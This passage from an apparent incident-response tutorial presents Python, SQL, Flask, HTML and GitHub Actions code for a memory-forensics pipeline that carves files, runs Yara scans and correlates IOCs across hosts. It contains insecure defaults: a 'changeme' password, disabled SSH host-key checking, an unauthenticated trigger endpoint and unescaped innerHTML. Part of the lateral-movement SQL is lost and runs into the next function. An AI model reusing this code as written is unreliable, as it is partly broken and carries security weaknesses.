addresses\n        '-e', 'base64',     # Base64 encoded data\n        '-e', 'net',        # Network packets\n        '-e', 'winpe',      # Windows PE files\n        '-e', 'pdf',        # PDF documents\n        '-e', 'zip',        # ZIP\/Office archives\n        '-e', 'json',       # JSON data (configs, beacons)\n        image_path\n    ], capture_output=True, text=True, timeout=3600)\n\n    if result.returncode == 0:\n        # Parse bulk_extractor output files\n        for feat_file in bulk_out.glob('*.txt'):\n            if feat_file.stat().st_size == 0:\n                continue\n            feature_name = feat_file.stem\n            lines = feat_file.read_text(errors='replace').splitlines()\n            # Filter comment lines\n            entries = [l for l in lines if l and not l.startswith('#')]\n            results['bulk_extractor'][feature_name] = len(entries)\n\n            # Flag high-value findings\n            if feature_name == 'url' and entries:\n                for entry in entries[:100]:  # First 100 URLs\n                    parts = entry.split('\\t')\n                    if len(parts) &gt;= 2:\n                        url = parts[1]\n                        # Flag non-Microsoft, non-CDN URLs\n                        if url.startswith('http') and not any(\n                            d in url for d in [\n                                'microsoft.com', 'windows.com', 'google.com',\n                                'cloudflare.com', 'akamai.com'\n                            ]\n                        ):\n                            results['interesting'].append({\n                                'type':   'url',\n                                'value':  url,\n                                'source': 'bulk_extractor'\n                            })\n\n    # \u2500\u2500 foremost: carves file signatures \u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\n    foremost_out = output_path \/ 'foremost'\n    foremost_out.mkdir(exist_ok=True)\n\n    # Write custom config\n    config_file = output_path \/ 'foremost.conf'\n    config_file.write_text(FOREMOST_CONFIG)\n\n    log.info(f\"Running foremost on image {image_id}\")\n    result = subprocess.run([\n        'foremost',\n        '-c', str(config_file),\n        '-o', str(foremost_out),\n        '-i', image_path,\n        '-q'  # quiet mode\n    ], capture_output=True, text=True, timeout=3600)\n\n    # Count carved files by type\n    for type_dir in foremost_out.iterdir():\n        if type_dir.is_dir() and type_dir.name != 'audit.txt':\n            file_list = list(type_dir.glob('*'))\n            count = len(file_list)\n            results['carved_files'][type_dir.name] = count\n\n            # Flag carved PE files for Yara scanning\n            if type_dir.name in ('exe', 'dll') and count &gt; 0:\n                results['interesting'].append({\n                    'type':   'carved_pe',\n                    'value':  f\"{count} PE files carved from memory\",\n                    'path':   str(type_dir),\n                    'source': 'foremost'\n                })\n\n    log.info(f\"Carving complete for image {image_id}: \"\n             f\"{sum(results['carved_files'].values())} files carved\")\n\n    return results\n\ndef scan_carved_pes(carved_dir: str, yara_rules_path: str) -&gt; List[Dict]:\n    \"\"\"Run Yara against carved PE files to identify malware families.\"\"\"\n    import yara\n\n    if not Path(yara_rules_path).exists():\n        log.warning(\"Yara rules not found - skipping carved PE scan\")\n        return []\n\n    rules   = yara.load(yara_rules_path)\n    matches = []\n\n    for pe_file in Path(carved_dir).rglob('*.exe'):\n        try:\n            hits = rules.match(str(pe_file))\n            if hits:\n                matches.append({\n                    'file':  str(pe_file),\n                    'rules': [h.rule for h in hits],\n                    'size':  pe_file.stat().st_size\n                })\n                log.warning(f\"YARA HIT in carved file: {pe_file.name} -&gt; {[h.rule for h in hits]}\")\n        except Exception as e:\n            log.debug(f\"Yara scan failed for {pe_file}: {e}\")\n\n    return matches<\/pre>\n<h3>Cross-image IOC correlation: finding attacker infrastructure across the fleet<\/h3>\n<p>Individual memory image analysis tells you what is happening on one machine. Cross-image correlation tells you the full scope of an intrusion: which machines have seen the same C2 IP, which machines have the same injected code hash, which machines ran the same attacker tool at approximately the same time. This is where the PostgreSQL backend pays off: all analysis results from all images are in the same database, queryable together.<\/p>\n<pre>## cross_correlation.py - Fleet-wide IOC correlation analysis\n\n#!\/usr\/bin\/env python3\n\"\"\"\nCross-image correlation engine.\nFinds common IOCs, processes, and artefacts across all analysed memory images.\nProduces a fleet-wide threat assessment showing attacker scope and pivot points.\n\"\"\"\n\nimport psycopg2\nimport json\nimport logging\nfrom datetime import datetime\nfrom pathlib import Path\nfrom typing import List, Dict, Tuple\nfrom collections import defaultdict\n\nlog = logging.getLogger(__name__)\nPOSTGRES_URL = 'postgresql:\/\/analyst:changeme@localhost\/memory_analysis'\n\ndef get_db():\n    return psycopg2.connect(POSTGRES_URL)\n\ndef correlate_external_ips() -&gt; List[Dict]:\n    \"\"\"Find external IP addresses seen in multiple memory images.\"\"\"\n    with get_db() as conn:\n        with conn.cursor() as cur:\n            cur.execute(\"\"\"\n                SELECT\n                    nc.remote_addr,\n                    nc.remote_port,\n                    COUNT(DISTINCT nc.image_id) AS host_count,\n                    ARRAY_AGG(DISTINCT mi.hostname ORDER BY mi.hostname) AS hostnames,\n                    ARRAY_AGG(DISTINCT nc.process_name) AS processes\n                FROM network_connections nc\n                JOIN memory_images mi ON mi.id = nc.image_id\n                WHERE\n                    nc.remote_addr != ''\n                    AND nc.remote_addr != '0.0.0.0'\n                    AND nc.remote_addr NOT LIKE '10.%'\n                    AND nc.remote_addr NOT LIKE '172.16.%'\n                    AND nc.remote_addr NOT LIKE '192.168.%'\n                    AND nc.remote_addr NOT LIKE '127.%'\n                    AND mi.status = 'complete'\n                GROUP BY nc.remote_addr, nc.remote_port\n                HAVING COUNT(DISTINCT nc.image_id) &gt;= 2\n                ORDER BY host_count DESC, nc.remote_addr\n            \"\"\")\n            rows = cur.fetchall()\n\n    results = []\n    for row in rows:\n        results.append({\n            'remote_ip':    row[0],\n            'remote_port':  row[1],\n            'host_count':   row[2],\n            'hostnames':    row[3],\n            'processes':    row[4],\n            'severity':     'CRITICAL' if row[2] &gt;= 5 else 'HIGH' if row[2] &gt;= 2 else 'MEDIUM',\n        })\n\n    return results\n\ndef correlate_malfind_patterns() -&gt; List[Dict]:\n    \"\"\"Find memory injection patterns seen across multiple hosts.\"\"\"\n    with get_db() as conn:\n        with conn.cursor() as cur:\n            cur.execute(\"\"\"\n                SELECT\n                    mf.protection,\n                    mf.has_pe_header,\n                    mf.risk_level,\n                    COUNT(DISTINCT mf.image_id) AS host_count,\n                    ARRAY_AGG(DISTINCT mi.hostname) AS hostnames,\n                    ARRAY_AGG(DISTINCT mf.process_name) AS processes,\n                    AVG(mf.entropy) AS avg_entropy\n                FROM malfind_results mf\n                JOIN memory_images mi ON mi.id = mf.image_id\n                WHERE mi.status = 'complete'\n                GROUP BY mf.protection, mf.has_pe_header, mf.risk_level\n                HAVING COUNT(DISTINCT mf.image_id) &gt;= 2\n                ORDER BY host_count DESC\n            \"\"\")\n            rows = cur.fetchall()\n\n    results = []\n    for row in rows:\n        results.append({\n            'protection':   row[0],\n            'has_pe_header':row[1],\n            'risk_level':   row[2],\n            'host_count':   row[3],\n            'hostnames':    row[4],\n            'processes':    row[5],\n            'avg_entropy':  float(row[6]) if row[6] else 0,\n        })\n    return results\n\ndef correlate_iocs() -&gt; List[Dict]:\n    \"\"\"Find IOC values seen across multiple memory images.\"\"\"\n    with get_db() as conn:\n        with conn.cursor() as cur:\n            cur.execute(\"\"\"\n                SELECT\n                    ioc.ioc_type,\n                    ioc.ioc_value,\n                    COUNT(DISTINCT ioc.image_id) AS host_count,\n                    ARRAY_AGG(DISTINCT mi.hostname) AS hostnames,\n                    ARRAY_AGG(DISTINCT ioc.process_name) AS processes,\n                    MIN(mi.acquired_at) AS first_seen,\n                    MAX(mi.acquired_at) AS last_seen\n                FROM iocs_extracted ioc\n                JOIN memory_images mi ON mi.id = ioc.image_id\n                WHERE mi.status = 'complete'\n                GROUP BY ioc.ioc_type, ioc.ioc_value\n                HAVING COUNT(DISTINCT ioc.image_id) &gt;= 2\n                ORDER BY host_count DESC, ioc.ioc_type\n            \"\"\")\n            rows = cur.fetchall()\n\n    results = []\n    for row in rows:\n        results.append({\n            'ioc_type':   row[0],\n            'ioc_value':  row[1],\n            'host_count': row[2],\n            'hostnames':  row[3],\n            'processes':  row[4],\n            'first_seen': str(row[5]),\n            'last_seen':  str(row[6]),\n        })\n    return results\n\ndef find_lateral_movement_timeline() -&gt; List[Dict]:\n    \"\"\"\n    Attempt to reconstruct lateral movement by correlating\n    process creation times across hosts.\n    Looks for the same attacker tool running on multiple hosts\n    within a short time window.\n    \"\"\"\n    with get_db() as conn:\n        with conn.cursor() as cur:\n            cur.execute(\"\"\"\n                WITH suspicious AS (\n                    SELECT\n                        pl.name,\n                        pl.create_time,\n                        mi.hostname,\n                        pl.pid,\n                        pl.cmd_line\n                    FROM process_list pl\n                    JOIN memory_images mi ON mi.id = pl.image_id\n                    WHERE pl.is_suspicious = TRUE\n                      AND pl.create_time IS NOT NULL\n                )\n                SELECT\n                    s1.name,\n                    s1.hostname AS first_host,\n                    s1.create_time AS first_time,\n                    s2.hostname AS second_host,\n                    s2.create_time AS second_time,\n                    EXTRACT(EPOCH FROM (s2.create_time - s1.create_time))\/60 AS minutes_between\n                FROM suspicious s1\n                JOIN suspicious s2 ON\n                    s1.name = s2.name\n                    AND s1.hostname != s2.hostname\n                    AND s2.create_time &gt; s1.create_time\n                    AND s2.create_time - s1.create_time  Dict:\n    \"\"\"Generate the complete fleet-wide correlation report.\"\"\"\n    log.info(\"Running fleet-wide cross-image correlation\")\n\n    # Count completed images\n    with get_db() as conn:\n        with conn.cursor() as cur:\n            cur.execute(\"\"\"\n                SELECT\n                    COUNT(*) AS total,\n                    SUM(CASE WHEN status='complete' THEN 1 ELSE 0 END) AS complete,\n                    SUM(CASE WHEN status LIKE '%running%' THEN 1 ELSE 0 END) AS running,\n                    SUM(CASE WHEN status LIKE '%failed%' THEN 1 ELSE 0 END) AS failed,\n                    SUM(CASE WHEN risk_score &gt;= 50 THEN 1 ELSE 0 END) AS critical_hosts\n                FROM memory_images mi\n                LEFT JOIN triage_results tr ON tr.image_id = mi.id\n            \"\"\")\n            fleet_stats = cur.fetchone()\n\n    shared_ips      = correlate_external_ips()\n    shared_malfind  = correlate_malfind_patterns()\n    shared_iocs     = correlate_iocs()\n    lateral_mv      = find_lateral_movement_timeline()\n\n    # Calculate overall threat level\n    critical_count = sum(1 for ip in shared_ips if ip['severity'] == 'CRITICAL')\n    overall_threat = (\n        'CRITICAL' if critical_count &gt; 0 or fleet_stats[4] &gt; 3 else\n        'HIGH'     if len(shared_ips) &gt; 0 or fleet_stats[4] &gt; 0 else\n        'MEDIUM'   if len(shared_iocs) &gt; 0 else\n        'LOW'\n    )\n\n    report = {\n        'generated_at':       datetime.now().isoformat(),\n        'overall_threat':     overall_threat,\n        'fleet_stats': {\n            'total_images':       fleet_stats[0],\n            'complete':           fleet_stats[1],\n            'processing':         fleet_stats[2],\n            'failed':             fleet_stats[3],\n            'critical_hosts':     fleet_stats[4],\n        },\n        'shared_c2_ips':          shared_ips,\n        'shared_injection_patterns': shared_malfind,\n        'shared_iocs':            shared_iocs,\n        'lateral_movement_indicators': lateral_mv,\n        'summary': (\n            f\"Fleet analysis of {fleet_stats[0]} endpoints. \"\n            f\"Overall threat level: {overall_threat}. \"\n            f\"{len(shared_ips)} shared external IP(s), \"\n            f\"{fleet_stats[4]} critical host(s), \"\n            f\"{len(lateral_mv)} potential lateral movement indicator(s).\"\n        )\n    }\n\n    # Save report\n    report_path = Path('\/srv\/memory\/reports\/fleet_correlation.json')\n    with open(report_path, 'w') as f:\n        json.dump(report, f, indent=2, default=str)\n\n    log.info(f\"Fleet report saved to {report_path}\")\n    log.info(f\"Overall threat level: {overall_threat}\")\n\n    if shared_ips:\n        log.warning(f\"SHARED C2 IPs DETECTED across {len(shared_ips)} IP(s):\")\n        for ip in shared_ips[:5]:\n            log.warning(f\"  {ip['remote_ip']}:{ip['remote_port']} on {ip['host_count']} hosts: {ip['hostnames']}\")\n\n    return report\n\nif __name__ == '__main__':\n    logging.basicConfig(level=logging.INFO, format='%(asctime)s %(levelname)s %(message)s')\n    report = generate_fleet_report()\n    print(json.dumps(report, indent=2, default=str))<\/pre>\n<h3>The analyst dashboard<\/h3>\n<p>Raw pipeline output in a PostgreSQL database and JSON files is not usable under incident pressure. Analysts need a single view that shows which images are processing, which have completed, which have high-risk findings, and the cross-image correlation results. A lightweight Flask dashboard served by the Docker Compose stack provides this without requiring a full SIEM deployment.<\/p>\n<pre>## dashboard\/app.py - Flask analyst dashboard\n\nfrom flask import Flask, render_template, jsonify, request\nimport psycopg2\nimport psycopg2.extras\nimport json\nimport os\nfrom datetime import datetime\n\napp = Flask(__name__)\nPOSTGRES_URL = os.environ.get('POSTGRES_URL', 'postgresql:\/\/analyst:changeme@localhost\/memory_analysis')\n\ndef get_db():\n    conn = psycopg2.connect(POSTGRES_URL, cursor_factory=psycopg2.extras.RealDictCursor)\n    return conn\n\n@app.route('\/')\ndef index():\n    return render_template('dashboard.html')\n\n@app.route('\/api\/fleet-status')\ndef fleet_status():\n    with get_db() as conn:\n        with conn.cursor() as cur:\n            cur.execute(\"\"\"\n                SELECT\n                    mi.id, mi.hostname, mi.status, mi.tier,\n                    mi.image_size_gb, mi.received_at, mi.sha256,\n                    tr.risk_score, tr.suspicious_process_count,\n                    tr.has_malfind, tr.network_conn_count,\n                    CASE\n                        WHEN tr.risk_score &gt;= 50 THEN 'CRITICAL'\n                        WHEN tr.risk_score &gt;= 20 THEN 'HIGH'\n                        WHEN tr.risk_score &gt;= 5  THEN 'MEDIUM'\n                        ELSE 'LOW'\n                    END AS risk_label\n                FROM memory_images mi\n                LEFT JOIN triage_results tr ON tr.image_id = mi.id\n                ORDER BY tr.risk_score DESC NULLS LAST, mi.received_at DESC\n            \"\"\")\n            rows = cur.fetchall()\n    return jsonify([dict(r) for r in rows])\n\n@app.route('\/api\/host\/')\ndef host_detail(image_id):\n    with get_db() as conn:\n        with conn.cursor() as cur:\n            # Suspicious processes\n            cur.execute(\"\"\"\n                SELECT pid, ppid, name, path, cmd_line, suspicious_reason\n                FROM process_list\n                WHERE image_id = %s AND is_suspicious = TRUE\n                ORDER BY pid\n            \"\"\", (image_id,))\n            suspicious_procs = [dict(r) for r in cur.fetchall()]\n\n            # Malfind regions\n            cur.execute(\"\"\"\n                SELECT pid, process_name, protection, has_pe_header,\n                       entropy, risk_level, yara_matches\n                FROM malfind_results\n                WHERE image_id = %s\n                ORDER BY risk_level, entropy DESC\n            \"\"\", (image_id,))\n            malfind = [dict(r) for r in cur.fetchall()]\n\n            # Network connections\n            cur.execute(\"\"\"\n                SELECT pid, process_name, remote_addr, remote_port, state, is_suspicious\n                FROM network_connections\n                WHERE image_id = %s AND remote_addr != '' AND remote_addr != '0.0.0.0'\n                ORDER BY is_suspicious DESC, remote_port\n            \"\"\", (image_id,))\n            connections = [dict(r) for r in cur.fetchall()]\n\n            # IOCs\n            cur.execute(\"\"\"\n                SELECT ioc_type, ioc_value, process_name, confidence\n                FROM iocs_extracted\n                WHERE image_id = %s\n                ORDER BY ioc_type\n            \"\"\", (image_id,))\n            iocs = [dict(r) for r in cur.fetchall()]\n\n    return jsonify({\n        'suspicious_processes': suspicious_procs,\n        'malfind_regions':      malfind,\n        'network_connections':  connections,\n        'iocs':                 iocs,\n    })\n\n@app.route('\/api\/fleet-correlation')\ndef fleet_correlation():\n    \"\"\"Return cross-image correlation results.\"\"\"\n    report_path = '\/srv\/memory\/reports\/fleet_correlation.json'\n    try:\n        with open(report_path) as f:\n            return jsonify(json.load(f))\n    except FileNotFoundError:\n        return jsonify({'error': 'Correlation report not yet generated'}), 404\n\n@app.route('\/api\/trigger-correlation', methods=['POST'])\ndef trigger_correlation():\n    \"\"\"Manually trigger fleet correlation analysis.\"\"\"\n    import subprocess\n    subprocess.Popen(['python3', '\/srv\/memory\/cross_correlation.py'])\n    return jsonify({'status': 'triggered'})\n\nif __name__ == '__main__':\n    app.run(host='0.0.0.0', port=8080, debug=False)<\/pre>\n<pre>## dashboard\/templates\/dashboard.html - Single-page analyst interface\n\n&lt;!DOCTYPE html&gt;\n&lt;html lang=\"en\"&gt;\n&lt;head&gt;\n&lt;meta charset=\"UTF-8\"&gt;\n&lt;meta name=\"viewport\" content=\"width=device-width, initial-scale=1.0\"&gt;\n&lt;title&gt;Memory Analysis Dashboard&lt;\/title&gt;\n&lt;style&gt;\n  * { box-sizing: border-box; margin: 0; padding: 0; }\n  body { font-family: 'JetBrains Mono', monospace; background: #0f172a; color: #e2e8f0; font-size: 13px; }\n  .header { background: #1e2433; padding: 16px 24px; border-bottom: 1px solid #334155; display: flex; align-items: center; gap: 16px; }\n  .header h1 { font-size: 16px; color: #f59e0b; }\n  .stats { display: flex; gap: 12px; margin-left: auto; }\n  .stat { background: #0f172a; padding: 6px 14px; border-radius: 6px; text-align: center; }\n  .stat-val { font-size: 18px; font-weight: 700; }\n  .stat-lbl { font-size: 9px; color: #64748b; text-transform: uppercase; letter-spacing: 0.1em; }\n  .critical { color: #ef4444; } .high { color: #f97316; }\n  .medium { color: #eab308; } .low { color: #22c55e; }\n  .container { padding: 20px 24px; }\n  table { width: 100%; border-collapse: collapse; }\n  th { text-align: left; padding: 8px 12px; font-size: 9px; color: #64748b; text-transform: uppercase; letter-spacing: 0.1em; border-bottom: 1px solid #1e293b; }\n  td { padding: 10px 12px; border-bottom: 1px solid #1e293b; }\n  tr:hover { background: #1e293b; cursor: pointer; }\n  .badge { display: inline-block; padding: 2px 8px; border-radius: 3px; font-size: 9px; font-weight: 600; }\n  .badge-critical { background: #450a0a; color: #ef4444; border: 1px solid #ef4444; }\n  .badge-high     { background: #431407; color: #f97316; border: 1px solid #f97316; }\n  .badge-medium   { background: #422006; color: #eab308; border: 1px solid #eab308; }\n  .badge-low      { background: #052e16; color: #22c55e; border: 1px solid #22c55e; }\n  .status-pill { background: #1e293b; padding: 2px 8px; border-radius: 10px; font-size: 10px; }\n  .btn { background: #1e293b; border: 1px solid #334155; color: #94a3b8; padding: 6px 14px; border-radius: 6px; cursor: pointer; font-family: monospace; font-size: 11px; }\n  .btn:hover { border-color: #f59e0b; color: #f59e0b; }\n&lt;\/style&gt;\n&lt;\/head&gt;\n&lt;body&gt;\n&lt;div class=\"header\"&gt;\n  &lt;h1&gt;Memory Analysis Pipeline&lt;\/h1&gt;\n  &lt;div class=\"stats\"&gt;\n    &lt;div class=\"stat\"&gt;&lt;div class=\"stat-val\" id=\"total-count\"&gt;-&lt;\/div&gt;&lt;div class=\"stat-lbl\"&gt;Total&lt;\/div&gt;&lt;\/div&gt;\n    &lt;div class=\"stat\"&gt;&lt;div class=\"stat-val critical\" id=\"critical-count\"&gt;-&lt;\/div&gt;&lt;div class=\"stat-lbl\"&gt;Critical&lt;\/div&gt;&lt;\/div&gt;\n    &lt;div class=\"stat\"&gt;&lt;div class=\"stat-val high\" id=\"complete-count\"&gt;-&lt;\/div&gt;&lt;div class=\"stat-lbl\"&gt;Complete&lt;\/div&gt;&lt;\/div&gt;\n  &lt;\/div&gt;\n  &lt;button class=\"btn\" onclick=\"triggerCorrelation()\"&gt;Run Correlation&lt;\/button&gt;\n  &lt;button class=\"btn\" onclick=\"loadData()\"&gt;Refresh&lt;\/button&gt;\n&lt;\/div&gt;\n&lt;div class=\"container\"&gt;\n  &lt;table&gt;\n    &lt;thead&gt;&lt;tr&gt;\n      &lt;th&gt;Host&lt;\/th&gt;&lt;th&gt;Tier&lt;\/th&gt;&lt;th&gt;Risk&lt;\/th&gt;\n      &lt;th&gt;Status&lt;\/th&gt;&lt;th&gt;Size&lt;\/th&gt;&lt;th&gt;Suspicious Procs&lt;\/th&gt;\n      &lt;th&gt;Malfind&lt;\/th&gt;&lt;th&gt;Connections&lt;\/th&gt;\n    &lt;\/tr&gt;&lt;\/thead&gt;\n    &lt;tbody id=\"host-table\"&gt;&lt;\/tbody&gt;\n  &lt;\/table&gt;\n&lt;\/div&gt;\n&lt;script&gt;\nasync function loadData() {\n  const data = await fetch('\/api\/fleet-status').then(r =&gt; r.json());\n  document.getElementById('total-count').textContent = data.length;\n  document.getElementById('critical-count').textContent = data.filter(h =&gt; h.risk_label === 'CRITICAL').length;\n  document.getElementById('complete-count').textContent = data.filter(h =&gt; h.status === 'complete').length;\n\n  const tbody = document.getElementById('host-table');\n  tbody.innerHTML = data.map(h =&gt; `\n    &lt;tr onclick=\"window.open('\/api\/host\/${h.id}','_blank')\"&gt;\n      &lt;td style=\"font-weight:600\"&gt;${h.hostname}&lt;\/td&gt;\n      &lt;td&gt;T${h.tier || '-'}&lt;\/td&gt;\n      &lt;td&gt;&lt;span class=\"badge badge-${(h.risk_label||'low').toLowerCase()}\"&gt;${h.risk_label || 'N\/A'}&lt;\/span&gt;&lt;\/td&gt;\n      &lt;td&gt;&lt;span class=\"status-pill\"&gt;${h.status}&lt;\/span&gt;&lt;\/td&gt;\n      &lt;td&gt;${h.image_size_gb ? h.image_size_gb.toFixed(1) + ' GB' : '-'}&lt;\/td&gt;\n      &lt;td style=\"color:${h.suspicious_process_count &gt; 0 ? '#f97316' : '#64748b'}\"&gt;${h.suspicious_process_count || 0}&lt;\/td&gt;\n      &lt;td style=\"color:${h.has_malfind ? '#ef4444' : '#64748b'}\"&gt;${h.has_malfind ? 'YES' : 'no'}&lt;\/td&gt;\n      &lt;td&gt;${h.network_conn_count || 0}&lt;\/td&gt;\n    &lt;\/tr&gt;\n  `).join('');\n}\n\nasync function triggerCorrelation() {\n  await fetch('\/api\/trigger-correlation', {method: 'POST'});\n  alert('Correlation analysis triggered. Refresh in 60 seconds.');\n}\n\nloadData();\nsetInterval(loadData, 30000);\n&lt;\/script&gt;\n&lt;\/body&gt;\n&lt;\/html&gt;<\/pre>\n<h3>The CI\/CD pipeline: GitHub Actions for automated ruleset deployment<\/h3>\n<p>The Yara ruleset, pipeline configuration, and correlation scripts need to be version controlled and automatically deployed when updated. A GitHub Actions workflow handles this: when a new Yara rule is pushed to the repository, the action compiles the full ruleset, tests it against clean samples, and deploys the updated compiled ruleset to the analysis server. This keeps the detection capability current without manual SSH sessions.<\/p>\n<pre>## .github\/workflows\/deploy_rules.yml\n## Triggered on push to main branch when Yara rules change\n\nname: Compile and Deploy Yara Rules\n\non:\n  push:\n    branches: [main]\n    paths:\n      - 'yara_rules\/**'\n      - 'pipeline\/**'\n      - 'requirements.txt'\n\njobs:\n  compile-and-test:\n    runs-on: ubuntu-latest\n    steps:\n      - name: Checkout repository\n        uses: actions\/checkout@v4\n\n      - name: Set up Python\n        uses: actions\/setup-python@v5\n        with:\n          python-version: '3.11'\n\n      - name: Install dependencies\n        run: |\n          pip install yara-python pefile\n          sudo apt-get install -y yara\n\n      - name: Lint Yara rules individually\n        run: |\n          echo \"Checking individual rule files...\"\n          ERRORS=0\n          for rule_file in yara_rules\/rules\/*.yar; do\n            if ! yara \"$rule_file\" \/dev\/null 2&gt;\/dev\/null; then\n              echo \"SYNTAX ERROR: $rule_file\"\n              ERRORS=$((ERRORS + 1))\n            else\n              echo \"OK: $rule_file\"\n            fi\n          done\n          if [ $ERRORS -gt 0 ]; then\n            echo \"Found $ERRORS rule file(s) with errors\"\n            exit 1\n          fi\n\n      - name: Compile combined ruleset\n        run: |\n          python3 pipeline\/compile_rules.py\n          echo \"Compiled ruleset size: $(du -sh yara_rules\/combined.yar)\"\n\n      - name: Test for false positives\n        run: |\n          # Download a small set of known-clean Windows binaries for FP testing\n          # In production, maintain a curated set of clean sample hashes\n          echo \"Running false positive checks...\"\n          python3 -c \"\n          import yara, os\n          rules = yara.compile('yara_rules\/combined.yar')\n          clean_bins = ['\/bin\/ls', '\/bin\/cat', '\/usr\/bin\/python3']\n          fps = 0\n          for f in clean_bins:\n              if os.path.exists(f):\n                  matches = rules.match(f)\n                  if matches:\n                      print(f'FP: {f} matched {[m.rule for m in matches]}')\n                      fps += 1\n          print(f'False positive check: {fps} hits in clean files')\n          exit(fps &gt; 2)\n          \"\n\n      - name: Upload compiled ruleset artifact\n        uses: actions\/upload-artifact@v4\n        with:\n          name: compiled-yara-rules\n          path: yara_rules\/combined.yar\n          retention-days: 30\n\n  deploy:\n    needs: compile-and-test\n    runs-on: ubuntu-latest\n    if: github.ref == 'refs\/heads\/main'\n    environment: production\n    steps:\n      - name: Download compiled ruleset\n        uses: actions\/download-artifact@v4\n        with:\n          name: compiled-yara-rules\n\n      - name: Deploy to analysis server\n        env:\n          DEPLOY_KEY: ${{ secrets.ANALYSIS_SERVER_DEPLOY_KEY }}\n          ANALYSIS_SERVER: ${{ secrets.ANALYSIS_SERVER_HOST }}\n        run: |\n          echo \"$DEPLOY_KEY\" &gt; \/tmp\/deploy_key\n          chmod 600 \/tmp\/deploy_key\n\n          # Copy compiled rules to analysis server\n          scp -i \/tmp\/deploy_key -o StrictHostKeyChecking=no \\\n              combined.yar \\\n              analyst@$ANALYSIS_SERVER:\/srv\/memory\/yara_rules\/combined.yar\n\n          # Verify deployment and restart any running scans\n          ssh -i \/tmp\/deploy_key -o StrictHostKeyChecking=no \\\n              analyst@$ANALYSIS_SERVER \\\n              'ls -lh \/srv\/memory\/yara_rules\/combined.yar &amp;&amp; echo \"Deployment verified\"'\n\n          rm \/tmp\/deploy_key\n\n      - name: Notify on deployment\n        if: always()\n        run: |\n          echo \"Yara ruleset deployed at $(date -u)\"<\/pre>\n<pre>## .github\/workflows\/pipeline_tests.yml\n## Integration tests for the processing pipeline\n\nname: Pipeline Integration Tests\n\non:\n  push:\n    paths:\n      - 'pipeline\/**'\n  pull_request:\n    paths:\n      - 'pipeline\/**'\n\njobs:\n  test-pipeline:\n    runs-on: ubuntu-latest\n    services:\n      redis:\n        image: redis:7-alpine\n        ports:\n          - 6379:6379\n      postgres:\n        image: postgres:15-alpine\n        env:\n          POSTGRES_DB:       memory_analysis\n          POSTGRES_USER:     analyst\n          POSTGRES_PASSWORD: testpassword\n        ports:\n          - 5432:5432\n        options: --health-cmd pg_isready --health-interval 10s\n\n    steps:\n      - uses: actions\/checkout@v4\n\n      - name: Set up Python\n        uses: actions\/setup-python@v5\n        with:\n          python-version: '3.11'\n\n      - name: Install dependencies\n        run: |\n          pip install -r requirements.txt\n          pip install pytest pytest-asyncio\n\n      - name: Initialize test database\n        env:\n          PGPASSWORD: testpassword\n        run: |\n          psql -h localhost -U analyst -d memory_analysis -f init_db.sql\n\n      - name: Run unit tests\n        env:\n          CELERY_BROKER_URL: redis:\/\/localhost:6379\/0\n          POSTGRES_URL: postgresql:\/\/analyst:testpassword@localhost\/memory_analysis\n        run: |\n          pytest tests\/ -v --tb=short\n\n      - name: Test pipeline task imports\n        env:\n          CELERY_BROKER_URL: redis:\/\/localhost:6379\/0\n          POSTGRES_URL: postgresql:\/\/analyst:testpassword@localhost\/memory_analysis\n        run: |\n          python3 -c \"\n          from pipeline.pipeline import (\n              validate_image, run_triage, run_deep_analysis,\n              extract_iocs, generate_report\n          )\n          print('All pipeline tasks imported successfully')\n          \"<\/pre>\n<h3>Operational runbook: running the pipeline during an active incident<\/h3>\n<p>All of the above infrastructure is built to run with minimal manual intervention during an incident. The following runbook describes the complete workflow from initial decision to collect through to analyst review of results.<\/p>\n<pre>## MEMORY COLLECTION RUNBOOK\n## Version: 1.0 | Last Updated: 2026-01\n\n## PHASE 1: DECISION AND SCOPING (5 minutes)\n##\n## 1. Run network impact estimation\npython3 \/srv\/memory\/network_impact.py \\\n    --tier1-count 2 --tier1-ram 64 \\\n    --tier2-count 10 --tier2-ram 32 \\\n    --tier3-count 38 --tier3-ram 16 \\\n    --link-speed-mbps 1000 \\\n    --max-utilisation 0.30\n\n## 2. Verify analysis server capacity\ndf -h \/srv\/memory\/landing          # Check storage available\nfree -h                            # Check RAM\nnproc                              # Check CPU count\n\n## 3. Verify pipeline is running\ncd \/srv\/memory &amp;&amp; docker-compose ps\nsystemctl status memory-watcher\n\n## PHASE 2: CONFIGURE AND LAUNCH COLLECTION (10 minutes)\n##\n## 4. Update target list for this incident\ncat &gt; \/srv\/memory\/targets_$(date +%Y%m%d).json &lt;&lt; &#039;TARGETS&#039;\n{\n  &quot;incident_id&quot;: &quot;INC-2026-001&quot;,\n  &quot;started_at&quot;:  &quot;2026-05-15T09:00:00Z&quot;,\n  &quot;targets&quot;: [\n    {&quot;hostname&quot;: &quot;DC01&quot;,     &quot;client_id&quot;: &quot;C.xxx&quot;, &quot;tier&quot;: 1, &quot;ram_gb&quot;: 64, &quot;priority&quot;: true},\n    {&quot;hostname&quot;: &quot;DC02&quot;,     &quot;client_id&quot;: &quot;C.yyy&quot;, &quot;tier&quot;: 1, &quot;ram_gb&quot;: 64},\n    {&quot;hostname&quot;: &quot;FILE01&quot;,   &quot;client_id&quot;: &quot;C.zzz&quot;, &quot;tier&quot;: 2, &quot;ram_gb&quot;: 32},\n    {&quot;hostname&quot;: &quot;WS-JOHN&quot;,  &quot;client_id&quot;: &quot;C.aaa&quot;, &quot;tier&quot;: 3, &quot;ram_gb&quot;: 16, &quot;priority&quot;: true}\n  ]\n}\nTARGETS\n\n## 5. Launch orchestrated collection\npython3 \/srv\/memory\/collection_orchestrator.py \\\n    --targets \/srv\/memory\/targets_$(date +%Y%m%d).json \\\n    --config \/etc\/velociraptor\/server.config.yaml\n\n## PHASE 3: MONITOR PROGRESS (ongoing)\n##\n## 6. Watch pipeline status\nwatch -n 30 &#039;psql postgresql:\/\/analyst:changeme@localhost\/memory_analysis \\\n    -c &quot;SELECT hostname, status, risk_score FROM memory_images \\\n        LEFT JOIN triage_results tr ON tr.image_id=memory_images.id \\\n        ORDER BY risk_score DESC NULLS LAST;&quot;&#039;\n\n## 7. Open analyst dashboard\necho &quot;Dashboard: http:\/\/$(hostname -I | awk &#039;{print $1}&#039;):8080&quot;\necho &quot;Celery monitor: http:\/\/$(hostname -I | awk &#039;{print $1}&#039;):5555&quot;\n\n## 8. Monitor network utilisation on analysis server\nsar -n DEV 5 | grep eth0\n\n## 